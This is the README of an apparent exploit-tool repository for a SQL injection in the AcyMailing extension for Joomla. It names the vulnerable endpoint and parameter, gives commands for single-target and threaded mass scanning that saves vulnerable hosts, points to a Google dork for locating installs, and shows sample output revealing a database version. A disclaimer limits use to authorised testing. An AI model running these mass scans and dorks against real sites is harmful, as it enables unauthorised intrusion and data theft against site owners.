作者: nullwhisper
仅限授权的安全研究 / 漏洞验证。
AcyMailing for Joomla 暴露了公共前端任务 frontentityselect::loadEntityFront。在旧版本中,columns 参数未经清理直接传入 SQL 查询。已修补版本使用 acym_secureDBColumn() 并返回类似 ... not secured 的错误。
index.php?option=com_acym&ctrl=frontentityselect&task=loadEntityFrontcolumns.
├── cve_2026_56292_acymailing_sqli.py # single + mass scanner
├── dorks.txt # google dorks
├── TECHNICAL.md # technical write-up
├── requirements.txt
├── LICENSE
└── README.md
pip3 install -r requirements.txt
单个目标:
python3 cve_2026_56292_acymailing_sqli.py -u http://target/
批量扫描:
python3 cve_2026_56292_acymailing_sqli.py -l targets.txt -v -T 30 -o vuln.txt
选项:
-u URL single target
-l LIST target list file
-t TIMEOUT request timeout (default 30)
-T THREADS concurrent threads (default 10)
-o OUTPUT output file for vulnerable targets
-v verbose
--proxy PROXY http/https proxy
--patched-output FILE
--error-output FILE
已在本地 Joomla 5 实验室中对 AcyMailing v11.0.3 安装进行了测试(漏洞模拟模式)。
[*] Loaded 1 unique target(s)
[1/1] [+] VULNERABLE: http://127.0.0.1:8080/ -> version=10.11.18-MariaDB-ubu2204
[*] Done. Vulnerable: 1 | Patched: 0 | Error/Other: 0 | Total: 1
参见 dorks.txt。主要 dork:
inurl:"index.php?option=com_acym"
本工具仅用于授权的安全测试和研究。请勿将其用于您不拥有的系统,或未经明确书面许可进行测试的系统。作者(nullwhisper)不对因使用本代码而造成的滥用或损害负责。
MIT — 参见 LICENSE。